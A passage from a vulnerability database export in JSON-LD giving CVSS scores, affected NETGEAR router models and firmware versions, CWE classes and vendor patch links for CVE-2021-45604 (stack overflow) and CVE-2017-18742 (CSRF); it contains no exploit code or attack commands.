"model": "d6220",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "lax20",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "cbr750",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "mk62",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ms60",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d6400",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-017178"
},
{
"db": "NVD",
"id": "CVE-2021-45604"
}
]
},
"cve": "CVE-2021-45604",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 2.7,
"confidentialityImpact": "NONE",
"exploitabilityScore": 5.1,
"id": "CVE-2021-45604",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.9,
"vectorString": "AV:A/AC:L/Au:S/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 4.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 0.9,
"id": "CVE-2021-45604",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 4.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2021-017178",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-45604",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2021-45604",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2021-45604",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202112-2400",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-45604",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-45604"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017178"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2400"
},
{
"db": "NVD",
"id": "CVE-2021-45604"
},
{
"db": "NVD",
"id": "CVE-2021-45604"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects CBR750 before 3.2.18.2, D6220 before 1.0.0.68, D6400 before 1.0.0.102, D8500 before 1.0.3.60, LAX20 before 1.1.6.28, MK62 before 1.0.6.116, MR60 before 1.0.6.116, MS60 before 1.0.6.116, R6300v2 before 1.0.4.50, R6400 before 1.0.1.68, R6400v2 before 1.0.4.118, R6700v3 before 1.0.4.118, R6900P before 1.3.3.140, R7000 before 1.0.11.116, R7000P before 1.3.3.140, R7850 before 1.0.5.68, R7900 before 1.0.4.38, R7900P before 1.4.2.84, R7960P before 1.4.2.84, R8000 before 1.0.4.68, R8000P before 1.4.2.84, RAX15 before 1.0.3.96, RAX20 before 1.0.3.96, RAX200 before 1.0.4.120, RAX35v2 before 1.0.3.96, RAX40v2 before 1.0.3.96, RAX43 before 1.0.3.96, RAX45 before 1.0.3.96, RAX50 before 1.0.3.96, RAX75 before 1.0.4.120, RAX80 before 1.0.4.120, RBK752 before 3.2.17.12, RBK852 before 3.2.17.12, RBR750 before 3.2.17.12, RBR850 before 3.2.17.12, RBS750 before 3.2.17.12, RBS850 before 3.2.17.12, RS400 before 1.5.1.80, and XR1000 before 1.0.0.58. plural NETGEAR The device contains a vulnerability related to out-of-bounds writes.Service operation interruption (DoS) It may be in a state. This affects CBR750 prior to 3.2.18.2, D6220 prior to 1.0.0.68, D6400 prior to 1.0.0.102, D8500 prior to 1.0.3.60, LAX20 prior to 1.1.6.28, MK62 prior to 1.0.6.116, MR60 prior to 1.0.6.116, MS60 prior to 1.0.6.116, R6300v2 prior to 1.0.4.50, R6400 prior to 1.0.1.68, R6400v2 prior to 1.0.4.118, R6700v3 prior to 1.0.4.118, R6900P prior to 1.3.3.140, R7000 prior to 1.0.11.116, R7000P prior to 1.3.3.140, R7850 prior to 1.0.5.68, R7900 prior to 1.0.4.38, R7900P prior to 1.4.2.84, R7960P prior to 1.4.2.84, R8000 prior to 1.0.4.68, R8000P prior to 1.4.2.84, RAX15 prior to 1.0.3.96, RAX20 prior to 1.0.3.96, RAX200 prior to 1.0.4.120, RAX35v2 prior to 1.0.3.96, RAX40v2 prior to 1.0.3.96, RAX43 prior to 1.0.3.96, RAX45 prior to 1.0.3.96, RAX50 prior to 1.0.3.96, RAX75 prior to 1.0.4.120, RAX80 prior to 1.0.4.120, RBK752 prior to 3.2.17.12, RBK852 prior to 3.2.17.12, RBR750 prior to 3.2.17.12, RBR850 prior to 3.2.17.12, RBS750 prior to 3.2.17.12, RBS850 prior to 3.2.17.12, RS400 prior to 1.5.1.80, and XR1000 prior to 1.0.0.58",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-45604"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017178"
},
{
"db": "VULMON",
"id": "CVE-2021-45604"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-45604",
"trust": 3.3
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017178",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2400",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-45604",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-45604"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017178"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2400"
},
{
"db": "NVD",
"id": "CVE-2021-45604"
}
]
},
"id": "VAR-202112-2345",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.3122930857894737
},
"last_update_date": "2024-11-23T22:54:44.868000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security\u00a0Advisory\u00a0for\u00a0Post-Authentication\u00a0Stack\u00a0Overflow\u00a0on\u00a0Some\u00a0Routers\u00a0and\u00a0WiFi\u00a0Systems,\u00a0PSV-2020-0572",
"trust": 0.8,
"url": "https://kb.netgear.com/000064526/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-and-WiFi-Systems-PSV-2020-0572"
},
{
"title": "Netgear RBR750 and NETGEAR Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=177121"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-017178"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2400"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-017178"
},
{
"db": "NVD",
"id": "CVE-2021-45604"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://kb.netgear.com/000064526/security-advisory-for-post-authentication-stack-overflow-on-some-routers-and-wifi-systems-psv-2020-0572"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-45604"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/787.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-45604"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017178"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2400"
},
{
"db": "NVD",
"id": "CVE-2021-45604"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2021-45604"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017178"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2400"
},
{
"db": "NVD",
"id": "CVE-2021-45604"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-12-26T00:00:00",
"db": "VULMON",
"id": "CVE-2021-45604"
},
{
"date": "2023-01-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-017178"
},
{
"date": "2021-12-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202112-2400"
},
{
"date": "2021-12-26T01:15:17.900000",
"db": "NVD",
"id": "CVE-2021-45604"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-01-06T00:00:00",
"db": "VULMON",
"id": "CVE-2021-45604"
},
{
"date": "2023-01-06T06:15:00",
"db": "JVNDB",
"id": "JVNDB-2021-017178"
},
{
"date": "2022-01-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202112-2400"
},
{
"date": "2024-11-21T06:32:38.723000",
"db": "NVD",
"id": "CVE-2021-45604"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202112-2400"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0NETGEAR\u00a0 Out-of-bounds write vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-017178"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202112-2400"
}
],
"trust": 0.6
}
}
var-202004-1346
Vulnerability from variot
Certain NETGEAR devices are affected by CSRF. This affects JR6150 before 1.0.1.10, R6050 before 1.0.1.10, R6250 before 1.0.4.12, R6300v2 before 1.0.4.8, R6700 before 1.0.1.16, R6900 before 1.0.1.16, R7300DST before 1.0.0.54, R7900 before 1.0.1.12, R8000 before 1.0.3.32, and R8500 before 1.0.2.74. plural NETGEAR A cross-site request forgery vulnerability exists in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6250, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that the WEB application does not fully verify whether the request comes from a trusted user. An attacker can use this vulnerability to send unexpected requests to the server through the affected client
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1346",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "jr6150",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.10"
},
{
"model": "r6050",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.10"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.74"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.32"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "jr6150",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.10"
},
{
"model": "r6050",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.10"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r8000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.32"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.74"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.8"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50917"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014939"
},
{
"db": "NVD",
"id": "CVE-2017-18742"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:jr6150_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6050_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7300dst_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r8000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r8500_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014939"
}
]
},
"cve": "CVE-2017-18742",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2017-18742",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2017-014939",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2021-50917",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18742",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18742",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-014939",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18742",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18742",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2017-014939",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-50917",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1983",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50917"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014939"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1983"
},
{
"db": "NVD",
"id": "CVE-2017-18742"
},
{
"db": "NVD",
"id": "CVE-2017-18742"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by CSRF. This affects JR6150 before 1.0.1.10, R6050 before 1.0.1.10, R6250 before 1.0.4.12, R6300v2 before 1.0.4.8, R6700 before 1.0.1.16, R6900 before 1.0.1.16, R7300DST before 1.0.0.54, R7900 before 1.0.1.12, R8000 before 1.0.3.32, and R8500 before 1.0.2.74. plural NETGEAR A cross-site request forgery vulnerability exists in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6250, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that the WEB application does not fully verify whether the request comes from a trusted user. An attacker can use this vulnerability to send unexpected requests to the server through the affected client",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18742"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014939"
},
{
"db": "CNVD",
"id": "CNVD-2021-50917"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18742",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014939",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-50917",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1983",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50917"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014939"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1983"
},
{
"db": "NVD",
"id": "CVE-2017-18742"
}
]
},
"id": "VAR-202004-1346",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50917"
}
],
"trust": 1.069822307
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50917"
}
]
},
"last_update_date": "2024-11-23T22:48:01.639000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Cross-Site Request Forgery on Some Routers, PSV-2017-0331",
"trust": 0.8,
"url": "https://kb.netgear.com/000051513/Security-Advisory-for-Cross-Site-Request-Forgery-on-Some-Routers-PSV-2017-0331"
},
{
"title": "Patch for Cross-site request forgery vulnerabilities in multiple NETGEAR products (CNVD-2021-50917)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/279081"
},
{
"title": "Multiple NETGEAR Repair measures for product cross-site request forgery vulnerability",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116746"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50917"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014939"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1983"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014939"
},
{
"db": "NVD",
"id": "CVE-2017-18742"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18742"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000051513/security-advisory-for-cross-site-request-forgery-on-some-routers-psv-2017-0331"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18742"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50917"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014939"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1983"
},
{
"db": "NVD",
"id": "CVE-2017-18742"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-50917"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014939"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1983"
},
{
"db": "NVD",
"id": "CVE-2017-18742"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-07-14T00:00:00",
"db": "CNVD",
